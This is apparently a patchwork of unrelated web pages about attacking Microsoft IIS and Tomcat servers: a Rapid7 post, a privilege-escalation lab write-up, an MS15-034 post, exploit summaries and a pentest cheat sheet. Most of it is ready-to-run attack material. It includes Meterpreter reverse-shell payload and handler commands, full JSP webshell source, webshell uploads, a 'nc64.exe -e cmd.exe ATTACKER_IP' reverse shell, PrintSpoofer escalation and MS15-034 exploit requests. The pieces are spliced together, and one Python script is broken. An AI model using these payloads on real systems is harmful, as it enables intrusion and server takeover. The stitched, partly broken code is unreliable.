- Dec 28, 2009
- 2 min read
- Rapid7
Last updated at Wed, 17 Jan 2024 21:29:52 GMT
As of this afternoon, the msfencode command has the ability to emit ASP scripts that execute Metasploit payloads. This can be used to exploit the currently-unpatched file name parsing bug feature in Microsoft IIS. This flaw allows a user who can upload a «safe» file extension (jpg, png, etc) to upload an ASP script and force it to execute on the web server. The bug occurs when a file name is specified in the form of «evil.asp;.jpg» – the application checks the file extension and sees «jpg», but the IIS server will stop parsing at the first «;» and sees «asp». The result is trivial code execution on any IIS server that allows users to choose the file name of their uploaded attachment.
For the following example, assume we have a web application that allows users to upload image files to the server. To complicate things, lets also assume that the application checks the file content to ensure that the uploaded file is a valid image. To exploit this, we need to generate an ASP script that drops a Meterpreter payload and configure a msfconsole instance to handle the session.
First we generate an ASP script that does a Meterpreter connect-back to the system running Metasploit:
$ msfpayload windows/meterpreter/reverse_tcp \
LHOST=1.2.3.4 LPORT=8443 R | \
msfencode -o evil.asp
Now we need to configure msfconsole to accept the incoming connection:
$ msfconsole
msf> use exploit/multi/handler
msf (handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf (handler) > set LHOST 1.2.3.4
msf (handler) > set LPORT 8443
msf (handler) > set ExitOnSession false
msf (handler) > exploit -j
To avoid the image content validator, we will prepend a valid JPG image to our ASP script:
$ cat happy.jpg evil.asp > "evil.asp;.jpg"
$ file "evil.asp;.jpg"
JPEG image data, JFIF standard 1.02
Now we upload our «evil.asp;.jpg» image to the web application. Since the extension ends in «jpg» and the contents of the file appear to be a valid JPEG, the web application accepts the file and renames it to «/images/evil.asp;.jpg»
Finally, we browse to the URL of the uploaded ASP/JPG, which will execute our payload and create a new session with the msfconsole:
[*] Starting the payload handler...
[*] Started reverse handler on port 8443
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.xxx:8443 -> 66.234.xx.xx:1186)
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > shell
Process 2668 created.
Channel 1 created.
wMicrosoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\inetsrv>whoami
nt authority\network service
POST TAGS
SHARING IS CARING
In this article on Windows Privilege Escalation SeImpersonatePrivilege, we will be showcasing the process of creating a lab environment on an IIS Server running a Windows Server 2019 machine. After setting the IIS server, we will be focusing on the usage of the SeImpersontePrivilege or “Impersonate a Client After Authentication” User Right Privileges to elevate the access on the machine using different methods.
Table of Contents
- Introduction
- Lab Setup
- IIS Installation
- Adding the Upload Functionality
- Changing Permissions
- Exploitation of IIS Server
- Elevating Privileges using PrintSpoofer
- Conclusion
Introduction
Talking about the SeImpersonatePrivilege (Impersonate a Client after Authentication), it was introduced in Windows 2000 SP4. Users who are assigned this privilege include members of the Device’s Local Administrators Group and the Device’s Local Service Account. Moreover, apart from these users and groups, the following components also have this user right: Services initiated by the Service Control Manager and Component Object Model (COM) servers initiated by the COM infrastructure. Now that we know which types of users have the SeImpersonatePrivilege, it’s time to understand what users gain with these privileges. Whenever a user receives the SeImpersonatePrivilege, they are permitted to run programs on behalf of a client, thereby supporting Windows Privilege Escalation SeImpersonatePrivilege scenarios.
Now that we have a certain understanding of the SeImpersontatePrivilege. Let’s dive into the Lab setup for now. We will discuss this as we proceed.
Lab Setup
As we learned from the Introduction that this kind of privilege is set on the users that are local administrators or have similar roles. So, to replicate the vulnerability, we will be using Window Server 2019 with AD. As Microsoft patched the vulnerabilities, we will be using Build 17763 as shown in the image below.
systeminfo
IIS Installation
We will be getting the particular privilege by installing the IIS server on our machine. To configure the IIS server, we will need to open the Server Manager and Choose the Add roles and features from the QuickStart Menu as shown in the image below.
This will open an Installation Wizard. We move through the Before You Begin section without making any changes. Now we are presented with the Installation Type section, we will proceed to choose the Role-based or feature-based installation option.
Again, we are breezing through the Server Selection as this would be different for each user as it is based on the name you gave to your server and its subsequent Forest. We get to the Server Roles section. Here, we have the option to choose the Web Server (IIS) as demonstrated below.
Configuring IIS Features and Completing Installation
Pressing the next button will lead us to the Features Section. Here, we have to make sure that we have some dependencies that are required for the IIS to function properly. It includes .NET Framework 4.7; chances are it will be installed by default. But other than that we need to install the ASP .NET 4.7 and under the WCF Services, we have the HTTP Activation and the TCP Port Sharing. Again, if you have something that is already installed, it is fine to move on by clicking Next.
Now, we have the section that has the Role-based Services that we want to install. There will be some automatically selected apart from those we will be selecting the Web Server and its components containing the Common HTTP Features, Health and Diagnostics, Performance and Security components as shown in the image below.
At last, we have the Confirmation Section. Here, we can verify all the services and components that we want to install. You can move on to the installation by clicking the Install button.
The Installation process will run for a little bit and then you would have successfully installed the IIS Service. We can view the IIS Welcome Page by accessing the IP Address of the Server through a Web Browser of your choice. In case, you run into an issue, try restarting the IIS service or the Server Itself.
Adding the Upload Functionality
Similar to the /var/www/html from the Linux HTTP server, we have the equivalent inside the inetpub/wwwroot location. It will have the welcome page that we viewed on the Web Browser Earlier. At this stage, we want to add the Upload Functionality onto our IIS Server. To do this, we created some web pages and scripts. We won’t be explaining those in detail over here. But, in case you want to add those on your deployment, download the files from our GitHub Repository and Extract those files inside the wwwroot directory in such a way that it replicates the image shown below.
To access the CS.aspx on our ISS Server, we will be editing the iisstart HTML page. Upon opening the file, the first time, you will be looking at some comments and the Official Microsoft Links. We removed those data and added the static address of our server followed by the name of the aspx file. This will make our CS.aspx webpage accessible when we click on the Welcome Page that used to redirect to the Microsoft Home Page. We are doing this to make our application easily accessible.
Changing Permissions
The process of adding web pages with the Upload functionality doesn’t end here, we need to change the permission so that we can access the webpage and upload files. To change the permissions, we open the IIS Manager. Here on the right-hand side Menu, we have the Edit Permissions option as highlighted in the image.
This will open the wwwroot Directory Permissions. Here, we are allowing the Users of the Domain Full Control with the Modify access of the wwwroot directory. However, there exists a more secure way of doing this by making a dedicated user for the management of the IIS Server and adding the restricted permissions for that particular user. However, in the interest of time and convenience, we are applying permission for all users.
Exploiting IIS Server
Now that we have the IIS Server up and running. Although we must mention that in case your IIS Server is not working as expected, try restarting the IIS service or the Server itself. Moving on, to exploit the IIS Server, we have added the File Upload functionality. Moving onto our attacker machine i.e., Kali Machine. Here, we have the Kali machine also set up in the network in such a way that it is possible to access the IIS service through a Web Browser on Kali. We browse the File Upload functionality and upload ASP Command Shell that is located at /usr/share/webshells/aspx/cmdasp.aspx on the webpage as shown in the image below.
Clicking on the Upload button, we will have the file successfully uploaded. This is just a demonstration; real-life scenarios will have additional security and steps involved before uploading a shell.
As per the programming of the files that provided the Upload functionality, it was managed that the uploaded files will be placed inside the Uploads directory. So, we can access the uploaded shell by browsing at /Uploads/cmdasp.aspx as shown in the image. Here we have a field that can be used to run commands on the target machine. We demonstrated this by running the net user command.
Gaining Meterpreter Shell and Enumerating Privileges
Now that we have tested that we can upload a shell and execute commands, it’s time to exploit the system and gain a meterpreter on the target machine. This means that we will need to create a payload using the msfvenom or any other tool of your choice. We are naming our payload as shell.exe
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.2 lport=1234 -f exe > shell.exe
After successfully creating the payload, we will upload the payload similarly as we did with the aspx shell earlier. We can see that the executable payload has been successfully uploaded to the target machine.
Now to generate the meterpreter shell, we will need to execute the payload as well. Hence, we will use the aspx shell to browse the path of the uploaded executable shell.exe file as shown in the image below.
Before Executing the payload, we will need to create a listener that will capture the meterpreter reverse shell generated from the payload. We will need to provide the same configurations that we used while crafting the payload using the msfvenom. Next, we will exploit the payload on the machine using the aspx shell and receive the meterpreter shell. Since we are focusing on the Privileges in this piece, we ran the getprivs command to get the privileges that are enabled on the target machine. We can see that the privilege in question is enabled on the target machine i.e., SeImpersontatePrivilege.
msfconsole use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.1.2 set lport 1234 exploit getprivs
Although you don’t need to rely on the Metepreter shell’s getprivs command. You can check for the enabled privilege can be checked with the help of the whoami command with the /priv option added to it as shown in the image below. We can see that the session that we gained through exploitation is for the user iisapppool.
shell whoami /priv whoami
Elevating Privileges using PrintSpoofer
One of the key resources abused in the wild to exploit the privilege we are discussing is called PrintSpoofer. You can get your hands on the source code and the ready-to-deploy executable from GitHub. Interestingly, this tool is relatively new; however, the technique it uses to elevate access is quite aged. To fully understand how this tool exploits the SeImpersonatePrivilege, we will now dive deeper into the access that this Windows Privilege Escalation SeImpersonatePrivilege provides.
As we discussed in the introduction, this privilege allows users to create a process with another user’s access. Therefore, PrintSpoofer exploits it to elevate access to the NT Authority level. In the demonstration provided below, we first move into the Public directory because it has the required write permissions for uploading the PrintSpoofer executable. Then, after uploading the executable, we move to the command shell on the target machine. After listing the contents, we can confirm that the transfer of the PrintSpoofer executable was successful.
Using the PrintSpoofer exploit is quite straightforward. All that is required are two parameters: -i to request an interactive session and -c to specify the access level after exploitation. When we run this command on the target machine, it searches for the SeImpersonatePrivilege and checks for a Named Pipe. After successfully completing these checks, it proceeds with the creation of the process specified by the -c option using the NT Authority token. Finally, we observe that a new command shell instance is generated. When we run the whoami command, it shows that we have successfully achieved Windows Privilege Escalation SeImpersonatePrivilege.
PrintSpoofer64.exe -i -c cmd whoami
Conclusion
During the research process, it became apparent that although many guides exist to use various tools to exploit the SeImpersonatePrivilege on the machine, there isn’t a single resource that shows how to set these privileges in the first place. Therefore, I hope that this article will help you grasp the concept of Windows Privilege Escalation using SeImpersonatePrivilege. It will also explain the methodology behind the exploitation of SeImpersonatePrivilege.
Author: Pavandeep Singh is a Technical Writer, Researcher, and Penetration Tester. Contact on LinkedIn
Hello Guys , Today we will discuss about Windows-IIS Server – MS15-034 Exploit . It’s related to remote exploit (code execution) Vulnerability.
MS15-034 Exploit :
This remote code execution vulnerability exists in the HTTP protocol stack(HTTP.sys) that is caused when HTTP.sys improperly parses specially crafted HTTP requests. An attacker who successfully exploited this vulnerability could execute arbitary code in the context of the System account.
By using this vulnerability, an attacker would have to send a specially crafted HTTP request to the affected system. The update address the vulnerability by modifying how the Windows HTTP stack handles requests
Exploit implementation in different methods:
Using Wget:
wget --header="Range: bytes=18446744073709551615" http://ip-address/iis-welcome.png
Using Telnet:
$ telnet 10.0.1.1 80 GET / HTTP/1.1 Host: stuff Range: bytes=0-18446744073709551615
Using Curl:
curl -v 10.0.1.1/static.png -H "Host: test" -H "Range: bytes=0-18446744073709551615"
Python Exploit Code:
Simple script:
import socket import random ip = "192.168.151.123" #Target IP Address req = "GET / HTTP1.1\r\nHost: stuff\r\nRange: bytes=1337-31337\r\n\r\n" cli_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) cli_sock.connect((ip,80)) cli_sock.send(req) resp= cli_sock.recv(1024) print resp
Python Exploit (Advanced Script – by c0dist):
import socket
import random
def scan(target):
header_rang = {"Range":"bytes=0-18446744073709551615"}
try:
head = requests.head(target)
if "IIS" in head.headers["server"]:
print "[+] Target is an IIS Server."
response= requests.get(target, headers=header_rang)
if response.status_code == 416:
return "Probable"
except Exception as e:
print "[-] Error Occured %s" %str(e)
return False
if __name__ == '__main__':
if len(sys.argv) !=2:
print "Usage: python %s <target>" %sys.argv[0]
sys.exit(1)
Detection Methods:
Nmap script :
https://github.com/pr4jwal/quick-scripts/blob/master/ms15-034.nse
Snort Rule:
alert tcp $EXTERNL_NET any -> $HOME_NET 80 (msg: " MS15-034 Range Header HTTP.sys Exploit"; content: "|0d 0a|Range: bytes="; nocase; content: "-"; within: 20 ; byte_test: 10,>,1000000000,0,relative,string,dec ; sid: 1001239;) (byte_test is limited to 10 bytes, so I just check if the first 10 bytes are larger then 1000000000)
We will discuss more exploits and vulnerabilities in future . Thanks for reading ..!!!
IIS 5.0 FTP Server / Remote SYSTEM exploit
This exploit targets IIS 5.0 FTP Server on Windows 2000 SP4. It allows an attacker to execute arbitrary code with SYSTEM privileges. The exploit has been modified by adding an additional egghunter for a secondary larger payload. It opens a bind shell on port 4444.
Microsoft IIS User Enumeration Vulnerability
Microsoft IIS is prone to an issue where the existence of users may be revealed to remote attackers. The vulnerability exists when users attempt to authenticate against a vulnerable system. IIS will generate an error page if authentication fails. Different messages are generated depending on whether the user exists or not.
Heap Overflow in Chunked Encoding Transfer Mechanism in Microsoft IIS
A heap overflow condition in the ‘chunked encoding transfer mechanism’ related to Active Server Pages has been reported for Microsoft IIS (Internet Information Services). This condition affects IIS 4.0 and IIS 5.0. Exploitation of this vulnerability may result in a denial of service or allow for a remote attacker to execute arbitrary instructions on the victim host. Microsoft IIS 5.0 is reported to ship with a default script (iisstart.asp) which may be sufficient for a remote attacker to exploit. Other sample scripts may also be exploitable.
Web-based SQL Query Information Disclosure
Malicious users could send specifically crafted HTTP request to an Internet Information Services server running Index Server to reveal path information, file attributes, and possibly some lines of the file contents.
Microsoft IIS Double Dot Directory Traversal Vulnerability
Microsoft IIS 4.0 and 5.0 are vulnerable to double dot «../» directory traversal exploitation if extended UNICODE character representations are used in substitution for «/» and «». Unauthenticated users may access any known file in the context of the IUSR_machinename account. Successful exploitation would yield the same privileges as a user who could successfully log onto the system to a remote user possessing no credentials whatsoever.»
Requesting a known filename with .htr extension preceded by approximately 230 ‘%20’ in Microsoft IIS
Requesting a known filename with the extension replaced with .htr preceeded by approximately 230 ‘%20’ from Microsoft IIS 4.0/5.0 will cause the server to retrieve the file and its contents. This is due to the .htr file extension being mapped to ISM.DLL ISAPI application which redirects .htr file requests to ISM.DLL. ISM.DLL removes the extraneous ‘%20’ and replaces .htr with the proper filename extension and reveals the source of the file. This vulnerability is similar to a more recently discovered variant, BugTraq ID 1488.
THCIISSLame 0.3 – IIS 5 SSL remote root exploit
THCIISSLame 0.3 is a remote root exploit for IIS 5 SSL. The exploit was found by Internet Security Systems and the reversing credits go to Halvar Flake. This exploit allows an attacker to gain remote root access on a target system running IIS 5 with SSL enabled. The exploit uses a connectback shell.
IIS 5 remote .printer overflow
This exploit overwrites an exception frame to control eip and get to our code. The code then locates the pointer to our larger buffer and execs.
Microsoft IIS WebDav ScStoragePathFromUrl Overflow
Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning with ‘If: <http://’ in a PROPFIND request, as exploited in the wild in July or August 2016.
Navigation :
IIS
Tomcat
Tips & Tricks
# Two interfaces for tomcat
/manager
/host-manager
# default root for IIS is
C:\inetpub\wwwroot
# Instead of using complicated relative path of the application use that one.
# Upload to:
C:\inetpub\wwwroot\shell.jsp
curl http://13.33.3.37/shell.jsp
Exploiting the classic Manager
# Metasploit provides an easy to use module to upload files and get a shell
use exploit/multi/http/tomcat_mgr_upload
msf exploit(multi/http/tomcat_mgr_upload) > set rhost 192.168.1.101
msf exploit(multi/http/tomcat_mgr_upload) > set rport 8080
msf exploit(multi/http/tomcat_mgr_upload) > set httpusername tomcat
msf exploit(multi/http/tomcat_mgr_upload) > set httppassword tomcat
msf exploit(multi/http/tomcat_mgr_upload) > exploit
# But also possible to only generate a WAR payload
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.108 LPORT=1234 -f war > shell.war
# And then set up a listener
nc -lvvp 1234
# Then deploy using the manager and browse to your shell path
# JSP Webshell
<FORM METHOD=GET ACTION='index.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec(cmd,null,null);
BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) { output += s+"</br>"; }
} catch(IOException e) { e.printStackTrace(); }
}
%>
<pre><%=output %></pre>
# Then pack it
mkdir webshell
cp index.jsp webshell/
cd webshell
jar -cvf ../webshell.war *
# Last step is deploying and browsin
Exploiting Host-Manager
https://www.certilience.fr/2019/03/variante-d-exploitation-dun-tomcat-host-manager/
# You can exploit this and get a webshell or even reverse shell by uploading a WAR file
# index.jsp
<FORM METHOD=GET ACTION='index.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec(cmd,null,null);
BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) { output += s+"</br>"; }
} catch(IOException e) { e.printStackTrace(); }
}
%>
<pre><%=output %></pre>
# Then craft a WAR archive
# |-- index.jsp
# |-- META-INF
# | |__ MANIFEST.MF
# |-- WEB-INF
# |__ web.xml
# You may need to add a new entry in the /etc/hosts
<IP> <Your VHOST>
# Then deploy a SMB Server
smbserver.py -smb2support <name> <path>
# In the host-manager
# NAME = Your VHOST
# ALIASES = Your VHOST
# APP base = \\Your-IP\<name>
# Deploy...
# Get a reverse shell
# You can drop a nc64.exe in your share then access it
\\IP\youshare\nc64.exe -e cmd.exe ATTACKER_IP PORT
# And then..
# rlwrap allows you to interface local and remote keyboard (giving arrows keyboards and history)
rlwrap ncat -klvp PORT
WebDAV
Tips & classic webshell upload
# If WebDAV is open, you can use tools like cadaver to connect
cadaver <ip>
dav:/> ls
Listing collection `/': succeeded.
# Webdav often works with the PUT HTTP method
# It means you can often upload files (for exampla, to get webshell)
curl -X PUT http://10.10.10.15/tmp.txt -d @cmdasp.aspx
curl -X MOVE -H "Destination:http://10.10.10.15/webshell.aspx" http://10.10.10.15/tmp.txt
# Or using cadaver
cp cmdasp.aspx cmdasp.txt
dav:/> put /path/to/cmdasp.txt
dav:/> move cmdasp.txt cmdasp.aspx
Reverse Shell
# If you can execute ASPX, you can craft reverse shell payloads
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.16.112 LPORT=54321 -f aspx > shell.aspx
# Then use a handler (MSF or nc for example)
msf> use exploit/multi/handler
msf> set payload windows/meterpreter/reverse_tcp
msf> set LHOST xxxxxx
msf> set LPORT xxxxxx
msf> run
CVE-2017-7269
# If you can't directly upload files, you still can look for known vulnerabilities
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > options
Module options (exploit/windows/iis/iis_webdav_scstoragepathfromurl):
Name Current Setting Required Description
---- --------------- -------- -----------
MAXPATHLENGTH 60 yes End of physical path brute force
MINPATHLENGTH 3 yes Start of physical path brute force
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.10.10.14 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Path of IIS 6 web application
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.16.112 yes The listen address (an interface may be specified)
LPORT 5566 yes The listen port
Exploit target:
Id Name
-- ----
0 Microsoft Windows Server 2003 R2 SP2 x86